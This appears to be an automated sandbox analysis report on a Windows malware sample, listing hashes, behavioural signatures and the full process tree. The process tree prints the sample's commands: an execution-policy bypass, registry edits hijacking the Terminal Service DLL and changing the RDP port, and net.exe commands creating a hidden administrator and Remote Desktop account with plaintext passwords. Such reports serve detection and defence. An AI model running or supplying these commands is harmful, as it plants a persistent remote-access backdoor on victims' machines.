Analysis
-
max time kernel
55s -
max time network
124s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-11-2020 10:53
Static task
static1
Behavioral task
behavioral1
Sample
cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
Resource
win10v20201028
General
-
Target
cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe
-
Size
3.1MB
-
MD5
63a4fa287d067ff9083c6d2bf5735016
-
SHA1
0e1ca1394559574751ba43f377aeea877ae4705c
-
SHA256
cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36
-
SHA512
424e2a60e704b983a4bef4a5c275c1133bbc2fd0b8d1b1b971dd79b74083878a6a8319816fc94d00f2c46e3abbaf7e4a4dd0e7599f6bdd80322f3d8a1f8a2121
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1696 1696 -
Modifies service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters reg.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 4028 powershell.exe 4028 powershell.exe 4028 powershell.exe 1392 powershell.exe 1392 powershell.exe 1392 powershell.exe 640 powershell.exe 640 powershell.exe 640 powershell.exe 3704 powershell.exe 3704 powershell.exe 3704 powershell.exe 4028 powershell.exe 4028 powershell.exe 4028 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 616 616 -
Suspicious use of AdjustPrivilegeToken 67 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4028 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 640 powershell.exe Token: SeSecurityPrivilege 640 powershell.exe Token: SeTakeOwnershipPrivilege 640 powershell.exe Token: SeLoadDriverPrivilege 640 powershell.exe Token: SeSystemProfilePrivilege 640 powershell.exe Token: SeSystemtimePrivilege 640 powershell.exe Token: SeProfSingleProcessPrivilege 640 powershell.exe Token: SeIncBasePriorityPrivilege 640 powershell.exe Token: SeCreatePagefilePrivilege 640 powershell.exe Token: SeBackupPrivilege 640 powershell.exe Token: SeRestorePrivilege 640 powershell.exe Token: SeShutdownPrivilege 640 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeSystemEnvironmentPrivilege 640 powershell.exe Token: SeRemoteShutdownPrivilege 640 powershell.exe Token: SeUndockPrivilege 640 powershell.exe Token: SeManageVolumePrivilege 640 powershell.exe Token: 33 640 powershell.exe Token: 34 640 powershell.exe Token: 35 640 powershell.exe Token: 36 640 powershell.exe Token: SeIncreaseQuotaPrivilege 3704 powershell.exe Token: SeSecurityPrivilege 3704 powershell.exe Token: SeTakeOwnershipPrivilege 3704 powershell.exe Token: SeLoadDriverPrivilege 3704 powershell.exe Token: SeSystemProfilePrivilege 3704 powershell.exe Token: SeSystemtimePrivilege 3704 powershell.exe Token: SeProfSingleProcessPrivilege 3704 powershell.exe Token: SeIncBasePriorityPrivilege 3704 powershell.exe Token: SeCreatePagefilePrivilege 3704 powershell.exe Token: SeBackupPrivilege 3704 powershell.exe Token: SeRestorePrivilege 3704 powershell.exe Token: SeShutdownPrivilege 3704 powershell.exe Token: SeDebugPrivilege 3704 powershell.exe Token: SeSystemEnvironmentPrivilege 3704 powershell.exe Token: SeRemoteShutdownPrivilege 3704 powershell.exe Token: SeUndockPrivilege 3704 powershell.exe Token: SeManageVolumePrivilege 3704 powershell.exe Token: 33 3704 powershell.exe Token: 34 3704 powershell.exe Token: 35 3704 powershell.exe Token: 36 3704 powershell.exe Token: SeIncreaseQuotaPrivilege 1392 powershell.exe Token: SeSecurityPrivilege 1392 powershell.exe Token: SeTakeOwnershipPrivilege 1392 powershell.exe Token: SeLoadDriverPrivilege 1392 powershell.exe Token: SeSystemProfilePrivilege 1392 powershell.exe Token: SeSystemtimePrivilege 1392 powershell.exe Token: SeProfSingleProcessPrivilege 1392 powershell.exe Token: SeIncBasePriorityPrivilege 1392 powershell.exe Token: SeCreatePagefilePrivilege 1392 powershell.exe Token: SeBackupPrivilege 1392 powershell.exe Token: SeRestorePrivilege 1392 powershell.exe Token: SeShutdownPrivilege 1392 powershell.exe Token: SeDebugPrivilege 1392 powershell.exe Token: SeSystemEnvironmentPrivilege 1392 powershell.exe Token: SeRemoteShutdownPrivilege 1392 powershell.exe Token: SeUndockPrivilege 1392 powershell.exe Token: SeManageVolumePrivilege 1392 powershell.exe Token: 33 1392 powershell.exe -
Suspicious use of WriteProcessMemory 70 IoCs
Processes:
cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 632 wrote to memory of 4028 632 cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe powershell.exe PID 632 wrote to memory of 4028 632 cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe powershell.exe PID 4028 wrote to memory of 184 4028 powershell.exe csc.exe PID 4028 wrote to memory of 184 4028 powershell.exe csc.exe PID 184 wrote to memory of 3608 184 csc.exe cvtres.exe PID 184 wrote to memory of 3608 184 csc.exe cvtres.exe PID 4028 wrote to memory of 1392 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 1392 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 640 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 640 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 3704 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 3704 4028 powershell.exe powershell.exe PID 4028 wrote to memory of 2112 4028 powershell.exe reg.exe PID 4028 wrote to memory of 2112 4028 powershell.exe reg.exe PID 4028 wrote to memory of 2212 4028 powershell.exe reg.exe PID 4028 wrote to memory of 2212 4028 powershell.exe reg.exe PID 4028 wrote to memory of 380 4028 powershell.exe reg.exe PID 4028 wrote to memory of 380 4028 powershell.exe reg.exe PID 4028 wrote to memory of 2584 4028 powershell.exe net.exe PID 4028 wrote to memory of 2584 4028 powershell.exe net.exe PID 2584 wrote to memory of 424 2584 net.exe net1.exe PID 2584 wrote to memory of 424 2584 net.exe net1.exe PID 4028 wrote to memory of 2188 4028 powershell.exe cmd.exe PID 4028 wrote to memory of 2188 4028 powershell.exe cmd.exe PID 2188 wrote to memory of 2252 2188 cmd.exe cmd.exe PID 2188 wrote to memory of 2252 2188 cmd.exe cmd.exe PID 2252 wrote to memory of 1632 2252 cmd.exe net.exe PID 2252 wrote to memory of 1632 2252 cmd.exe net.exe PID 1632 wrote to memory of 3360 1632 net.exe net1.exe PID 1632 wrote to memory of 3360 1632 net.exe net1.exe PID 4028 wrote to memory of 3996 4028 powershell.exe cmd.exe PID 4028 wrote to memory of 3996 4028 powershell.exe cmd.exe PID 3996 wrote to memory of 3724 3996 cmd.exe cmd.exe PID 3996 wrote to memory of 3724 3996 cmd.exe cmd.exe PID 3724 wrote to memory of 4032 3724 cmd.exe net.exe PID 3724 wrote to memory of 4032 3724 cmd.exe net.exe PID 4032 wrote to memory of 1112 4032 net.exe net1.exe PID 4032 wrote to memory of 1112 4032 net.exe net1.exe PID 1132 wrote to memory of 2316 1132 cmd.exe net.exe PID 1132 wrote to memory of 2316 1132 cmd.exe net.exe PID 2316 wrote to memory of 2272 2316 net.exe net1.exe PID 2316 wrote to memory of 2272 2316 net.exe net1.exe PID 852 wrote to memory of 2420 852 cmd.exe net.exe PID 852 wrote to memory of 2420 852 cmd.exe net.exe PID 2420 wrote to memory of 784 2420 net.exe net1.exe PID 2420 wrote to memory of 784 2420 net.exe net1.exe PID 3964 wrote to memory of 1952 3964 cmd.exe net.exe PID 3964 wrote to memory of 1952 3964 cmd.exe net.exe PID 1952 wrote to memory of 3860 1952 net.exe net1.exe PID 1952 wrote to memory of 3860 1952 net.exe net1.exe PID 3360 wrote to memory of 2188 3360 cmd.exe net.exe PID 3360 wrote to memory of 2188 3360 cmd.exe net.exe PID 2188 wrote to memory of 1888 2188 net.exe net1.exe PID 2188 wrote to memory of 1888 2188 net.exe net1.exe PID 3232 wrote to memory of 1836 3232 cmd.exe net.exe PID 3232 wrote to memory of 1836 3232 cmd.exe net.exe PID 1836 wrote to memory of 3372 1836 net.exe net1.exe PID 1836 wrote to memory of 3372 1836 net.exe net1.exe PID 3872 wrote to memory of 64 3872 cmd.exe net.exe PID 3872 wrote to memory of 64 3872 cmd.exe net.exe PID 64 wrote to memory of 2212 64 net.exe net1.exe PID 64 wrote to memory of 2212 64 net.exe net1.exe PID 4028 wrote to memory of 1240 4028 powershell.exe cmd.exe PID 4028 wrote to memory of 1240 4028 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe"C:\Users\Admin\AppData\Local\Temp\cd9d2ef442418e6a62d0a887e5f970301a48a52e4ec65e26cb31efbee14c8c36.exe"1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe-ep bypass -noexit -f C:\Users\Admin\AppData\Local\Temp\get-points.ps12⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE93.tmp" "c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies service
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc ZzvnUmPS /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc ZzvnUmPS /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc ZzvnUmPS /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc ZzvnUmPS1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc ZzvnUmPS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc ZzvnUmPS3⤵
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5
525c8172539cddd625bd3fe2e504b75c
SHA189b62752eaa65c9caf68b4229216b3bfd4091b93
SHA25666a60ca54dba739c590f7644d6e5ef731c51ac80835786f8155fd5dcf8ec3ef4
SHA5124de4d86027cd2f19b274fda37a4319d4f3cdd3729d83f5d58781ce14713403c095455df1434216eeed6a6d06439a92e844edecb7d05a989cf4625e868d53bc31
-
C:\Users\Admin\AppData\Local\Temp\RESBE93.tmpMD5
79e08933902978f1643b8582bf3197d7
SHA1c2724ed8ddda3141cdc1575fc77b84a1c93a4823
SHA25603ac892aad4412f676a286320a0c67bf9a587dd4bc869f3b8bd051ad9b3cda93
SHA5123ec0d1c7e45c06cdac6dc68f0a4733a7cecb29ee789e28136298a15aed63ed08b1b4b883ef56e769d4174837db38f5fa6a6d1e3fd4d798e5089b486d16529ae0
-
C:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.dllMD5
e85bbc5001eba2335e3573e08fd8a68c
SHA15ffc718ccde75123662989b2d0ad89bece2c97e5
SHA256863faaee290b318c2d679d4bb92e518e27410a22e3fe269d2db422d8726c118a
SHA512bce1bd6fa0a947e4b7bb48a6ff9e3e2fe04528745db146b2165a80c1166bb5a89fa3abfa3129c1b2e37bc8500e4eb2fbfec867423d4d0b656469bb69a10d0142
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
41d1a9d1cbee90f1e5f27fdfb299f8b8
SHA11e9ac27006a7c364649265246fccbd719418ceab
SHA2560f6c089b4cefa4a454150f08519573283b1a38e2c19cd7b04855a05d686d41b4
SHA512f178f88d0491cf72c3d4d591ab1d428691474a4c443822a0d270555c9dc4d05932057847b0e7106d564e6c9ddb33c0649e472258afca10696edc3dbb00f33422
-
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\CSC8AF4BC17464D01A9D7659FDF91E9B.TMPMD5
b853fe0d9efef8656f10907b6beeebd5
SHA14200f3dc0fe3d704aa00d2070797a05e41fd31ab
SHA256014fb2b2ae663435214e82b414327d2149c012738ab87f67e07832f0b9bfbe43
SHA5121d311a28ed1c073745e2c5d3204cf3a0f94ec9f9ddcddcd3d1b8d27766f540c8ae7d61babc31ca0e96e5e380b4eb54da2f338ebc7613f8d48ded053fbd6fb44e
-
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.0.csMD5
8e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
\??\c:\Users\Admin\AppData\Local\Temp\aiaedqju\aiaedqju.cmdlineMD5
8dea0e89d03bffd646d16884da5b01a0
SHA19585070bed528144401068f4a19e8c5612856e2a
SHA25615f568c1692b1774894730a86e019456f11035ed26742b3a5348aca0d0af94b9
SHA512f4bc8a23b62e35e61d97d201155d842ef0faf2c490b13802fbe3d6f3e88f69f624c0d9a5b44fae59cbcb28cd0916d6c133635d83ed6ee32dfca3215e596ec841
-
\Windows\Branding\mediasrv.pngMD5
37fb7ba711ffbe9d6ebb27d54e827966
SHA14d4d9303e011bcb14720b24239a1aacd58122f47
SHA25681b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5
SHA5123f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf
-
\Windows\Branding\mediasvc.pngMD5
2f916498a393e2f0d008d33a74c062ba
SHA1404d52d4253ef3843ae3f2c4aff050f37fcd3f08
SHA256d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412
SHA512d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10
-
memory/64-56-0x0000000000000000-mapping.dmp
-
memory/184-8-0x0000000000000000-mapping.dmp
-
memory/380-33-0x0000000000000000-mapping.dmp
-
memory/424-35-0x0000000000000000-mapping.dmp
-
memory/632-1-0x0000000000CA0000-0x0000000000CA1000-memory.dmpFilesize
4KB
-
memory/640-22-0x0000000000000000-mapping.dmp
-
memory/640-23-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmpFilesize
9.9MB
-
memory/784-49-0x0000000000000000-mapping.dmp
-
memory/1112-43-0x0000000000000000-mapping.dmp
-
memory/1240-58-0x0000000000000000-mapping.dmp
-
memory/1392-18-0x0000000000000000-mapping.dmp
-
memory/1392-19-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmpFilesize
9.9MB
-
memory/1564-61-0x0000000000000000-mapping.dmp
-
memory/1632-38-0x0000000000000000-mapping.dmp
-
memory/1712-60-0x0000000000000000-mapping.dmp
-
memory/1836-54-0x0000000000000000-mapping.dmp
-
memory/1888-53-0x0000000000000000-mapping.dmp
-
memory/1952-50-0x0000000000000000-mapping.dmp
-
memory/2112-31-0x0000000000000000-mapping.dmp
-
memory/2188-52-0x0000000000000000-mapping.dmp
-
memory/2188-36-0x0000000000000000-mapping.dmp
-
memory/2212-32-0x0000000000000000-mapping.dmp
-
memory/2212-57-0x0000000000000000-mapping.dmp
-
memory/2252-37-0x0000000000000000-mapping.dmp
-
memory/2272-47-0x0000000000000000-mapping.dmp
-
memory/2316-46-0x0000000000000000-mapping.dmp
-
memory/2420-48-0x0000000000000000-mapping.dmp
-
memory/2584-34-0x0000000000000000-mapping.dmp
-
memory/3168-59-0x0000000000000000-mapping.dmp
-
memory/3360-39-0x0000000000000000-mapping.dmp
-
memory/3372-55-0x0000000000000000-mapping.dmp
-
memory/3608-11-0x0000000000000000-mapping.dmp
-
memory/3704-27-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmpFilesize
9.9MB
-
memory/3704-25-0x0000000000000000-mapping.dmp
-
memory/3724-41-0x0000000000000000-mapping.dmp
-
memory/3860-51-0x0000000000000000-mapping.dmp
-
memory/3996-40-0x0000000000000000-mapping.dmp
-
memory/4028-16-0x000001CCA05B0000-0x000001CCA05B1000-memory.dmpFilesize
4KB
-
memory/4028-6-0x000001CC982E0000-0x000001CC982E1000-memory.dmpFilesize
4KB
-
memory/4028-15-0x000001CC98010000-0x000001CC98011000-memory.dmpFilesize
4KB
-
memory/4028-5-0x000001CCFFEF0000-0x000001CCFFEF1000-memory.dmpFilesize
4KB
-
memory/4028-17-0x000001CCA0940000-0x000001CCA0941000-memory.dmpFilesize
4KB
-
memory/4028-4-0x000001CCFD2D0000-0x000001CCFD2D1000-memory.dmpFilesize
4KB
-
memory/4028-3-0x00007FF9E7010000-0x00007FF9E79FC000-memory.dmpFilesize
9.9MB
-
memory/4028-2-0x0000000000000000-mapping.dmp
-
memory/4032-42-0x0000000000000000-mapping.dmp